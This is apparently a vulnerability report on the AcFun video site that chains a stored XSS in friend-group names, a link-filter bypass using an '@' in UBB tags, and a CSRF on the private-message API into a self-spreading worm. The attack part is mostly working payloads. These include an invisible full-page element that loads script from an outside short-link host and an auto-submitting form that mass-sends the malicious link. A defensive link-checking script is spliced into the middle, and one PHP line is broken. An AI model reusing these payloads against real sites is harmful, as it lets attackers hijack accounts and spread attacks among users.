Location: the friend group feature in the user center:
x" x="x
There is a length check on the page, but it doesn't matter. Capture the request and construct it as follows:
name=addGroup&groupName=x" onmouseover="var h=document.getElementsByTagName('head')[0];var s=document.createElement('script');s.src='http://126.am/70Qdp3';h.appendChild(s);" id="xss" style="position:absolute;top:0px;left:0px;z-index:999;padding:1000px;filter:alpha(opacity=0);-moz-opacity:0;opacity:0;"
Effect:
JS content:
alert('xss script');
$("#xss").remove();
The following shows how this can be made self-propagating:
The private message function in the user center can send links. The links are filtered and may only point to the acfun.tv domain:
However, a UBB tag can be constructed to bypass the filter:
[url=http://www.acfun.tv@126.am/n6ccT0]http://www.acfun.tv/v/ac634542[/url]
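A server-side check that rejects this kind of link, as an added example (not AcFun's code and not from the original report). The prefix test standing in for the site's filter, the allowlist and all function names are assumptions; the "legit" and "lookalike" samples are constructed.

```javascript
// Assumed allowlist of hosts a private-message link may point to.
const ALLOWED_HOSTS = new Set(['www.acfun.tv', 'acfun.tv']);

// Weak filter (assumed shape): a string-prefix test on the raw link.
function naiveIsAllowed(link) {
  return link.startsWith('http://www.acfun.tv');
}

// Hardened filter: parse first, then compare the parsed host exactly.
function strictIsAllowed(link) {
  let u;
  try {
    u = new URL(link);
  } catch (e) {
    return false; // unparsable input is rejected
  }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') return false;
  // Everything before '@' is userinfo, not the host; refuse it outright.
  if (u.username !== '' || u.password !== '') return false;
  return ALLOWED_HOSTS.has(u.hostname);
}

// Extract the target of every [url=...] tag in a message body.
function urlTargets(ubb) {
  const targets = [];
  const re = /\[url=([^\]]*)\]/gi;
  let m;
  while ((m = re.exec(ubb)) !== null) targets.push(m[1].trim());
  return targets;
}

// A message passes only if every link target passes the given check.
function messageIsSafe(ubb, check) {
  return urlTargets(ubb).every(check);
}

// The first sample is the link from the report; the others are constructed.
const SAMPLES = {
  bypass: '[url=http://www.acfun.tv@126.am/n6ccT0]http://www.acfun.tv/v/ac634542[/url]',
  legit: '[url=http://www.acfun.tv/v/ac634542]http://www.acfun.tv/v/ac634542[/url]',
  lookalike: '[url=http://www.acfun.tv.example.net/]x[/url]',
};

for (const [name, body] of Object.entries(SAMPLES)) {
  console.log(name, 'naive:', messageIsSafe(body, naiveIsAllowed),
    'strict:', messageIsSafe(body, strictIsAllowed));
}
```

The same parsed-host comparison should also be applied when the link is rendered, since the visible text of the tag can differ from its target.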
At the same time, http://www.acfun.tv/api/mail.aspx?name=newMail does not verify the source of the request:
<html>
<body>
<form id="csrf" name="csrf" action="http://www.acfun.tv/api/mail.aspx?name=newMail" method="POST">
<input type="hidden" name="userId" value="<?php echo rand(,); ?>"/>
<input type="hidden" name="content" value="[url=http://www.acfun.tv@126.am/n6ccT0]http://www.acfun.tv/v/ac634542[/url]"/>
<input type="submit" value="submit"/>
</form>
<script>
document.csrf.submit();
</script>
</body>
</html>
One-stop hijacking of notifications ...:
Solution:
You know better than I do..